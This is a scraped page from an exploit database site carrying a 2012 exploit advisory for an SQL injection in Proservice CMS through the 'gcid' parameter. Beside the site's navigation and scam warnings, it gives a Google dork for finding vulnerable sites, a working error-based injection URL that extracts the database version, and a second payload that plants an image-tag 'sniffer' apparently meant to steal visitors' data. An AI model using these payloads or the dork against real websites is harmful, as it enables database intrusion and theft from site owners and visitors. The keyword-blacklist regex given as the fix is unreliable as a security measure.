0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Proservice CMS Gallery Code SQL Injection Vulnerability
+----------------------------------------------------------------- | # Exploit Title: Proservice CMS Gallery Code SQL Injection Vulnerability | # Date: 30-06-2012 | # Author: cheki | # Vendor Link: http://proservice.ge/ | # Category:WebApp | # Price: NULL | # Contact: anrivardanidze@gmail.com | # Website: www.1337day.com && hacking.ge | # Greetings to: Anuka Bolqvadze and to rest of the 1337day members | # Google Dork: Created By: Pro-Service gcid=? +------------------------------------------------------------------- ------------------[~Product Detail~]-------------------- Studio "PRO-Service" is a company which has serious technical-intelectual base to make a suitable production for you and provide the development of internet resources in Georgia. Your site is a visit card of your business, first impression produce by a visual evaluation. Americain scientist due to their research have argued that 80% of customers firststival appreciate Web-site's appeareance and after his contents. Because of this the design's creation is one of the most principal and difficult activities while a creation of site and because good assumed Web-design have been often made ,,<B>secret of succes</B>'' of firm, against other covpetitor our company vill help you to plan your project in Internet and to produce exact marketing strategie. We make complicated,qualitative and individual web-sites which make an impression on customers. Every staff of our study works for your interest. ,,Pro-Service''company was staffed by a people with excellent professional skills. -------------------------------------------------------- -----------------[~TARGET INFO~]------------------------------ ~Apache httpd 2.2.15 ~MYSQL: 5.0.51 ~((Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 ~PHP/5.2.8 ------------------------------------------------------------- ----------------[~SQL INJECTION EXPLOIT~]-------------------- http://TARGET/index.php?m=342&gcid=83'+and+(select+1+from+(select+count(0),concat((select version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+ ----------------[~create snifer~]-------------------------- +and+(select+1+from+(select+count(0),concat((select hex('<img src="your snifer hare')),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+ ----------------------------------------------------------- ----------------[~fix bug~]-------------------------------- for proservice.ge ^_^ PHP FILTER preg_match('/(and|or|union|where|limit|group by|select|from|count|hex|rand|floor|\')/i', $gcid) ---------------------------------------------------------- ---------------[~Greetings to~]-------------------------- Anuka Bolqvadze ---------------------------------------------------------- # 0day.today [2024-12-24] #